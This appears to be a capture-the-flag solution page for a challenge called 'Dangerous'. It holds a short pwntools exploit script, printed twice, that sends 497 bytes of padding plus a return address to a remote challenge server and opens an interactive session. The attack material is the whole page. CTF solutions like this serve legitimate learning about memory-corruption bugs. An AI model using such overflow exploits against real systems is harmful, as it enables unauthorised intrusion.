Dangerous
from pwn import *
NUM_TO_RET = 497
flag = 0x401312
padding = b'A' * NUM_TO_RET
#p = process("./dangerous")
p = remote("jh2i.com", 50011)
p.sendline(flat(padding, flag, word_size=64))
p.interactive()Last updated
Was this helpful?
from pwn import *
NUM_TO_RET = 497
flag = 0x401312
padding = b'A' * NUM_TO_RET
#p = process("./dangerous")
p = remote("jh2i.com", 50011)
p.sendline(flat(padding, flag, word_size=64))
p.interactive()Last updated
Was this helpful?
Was this helpful?